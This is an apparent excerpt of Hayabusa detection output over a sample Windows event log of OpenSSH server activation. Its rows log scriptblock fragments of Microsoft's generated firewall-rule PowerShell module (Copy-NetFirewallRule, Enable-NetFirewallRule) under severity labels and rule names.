($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"etization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' -Alias '*' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] 
${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAp",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"etization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' -Alias '*' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"plicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) 
$__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"plicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 